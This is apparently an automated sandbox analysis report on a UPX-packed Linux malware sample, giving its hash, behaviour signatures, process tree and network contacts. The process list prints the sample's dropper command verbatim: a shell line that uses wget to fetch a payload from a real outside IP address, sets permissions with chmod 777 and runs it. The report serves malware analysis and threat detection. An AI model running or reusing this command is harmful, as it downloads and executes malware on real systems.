Analysis Overview
SHA256
9705f86089dcbedf355de1b957fc4836a98d707090c2116793fc7fe2bf1db189
Threat Level: Shows suspicious behavior
The file 1eba58349097d69448baf6e53a7f7e15_JaffaCakes118 was found to be: Shows suspicious behavior.
Malicious Activity Summary
UPX packed file
Deletes itself
Reads runtime system information
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-05-06 23:43
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-06 23:43
Reported
2024-05-06 23:46
Platform
ubuntu1804-amd64-20240226-en
Max time kernel
139s
Max time network
151s
Command Line
Signatures
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/1eba58349097d69448baf6e53a7f7e15_JaffaCakes118 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/exe | /tmp/1eba58349097d69448baf6e53a7f7e15_JaffaCakes118 | N/A |
Processes
/tmp/1eba58349097d69448baf6e53a7f7e15_JaffaCakes118
[/tmp/1eba58349097d69448baf6e53a7f7e15_JaffaCakes118]
/bin/sh
[sh -c wget http://185.105.4.242/wrgjwrgjwrg246356356356/n1; chmod 777 *; ./n1 wget.echo.telnet.x86]
/usr/bin/wget
[wget http://185.105.4.242/wrgjwrgjwrg246356356356/n1]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 151.101.130.49:443 | tcp | |
| US | 1.1.1.1:53 | cdn.fwupd.org | udp |
| US | 1.1.1.1:53 | cdn.fwupd.org | udp |
| US | 151.101.194.49:443 | cdn.fwupd.org | tcp |
| US | 151.101.1.91:443 | tcp | |
| GB | 89.187.167.5:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 195.181.164.21:443 | 1527653184.rsc.cdn77.org | tcp |
| RO | 185.105.4.242:80 | tcp | |
| RO | 185.105.4.242:80 | tcp |
Files
memory/1575-1-0x0000000008048000-0x000000000804d608-memory.dmp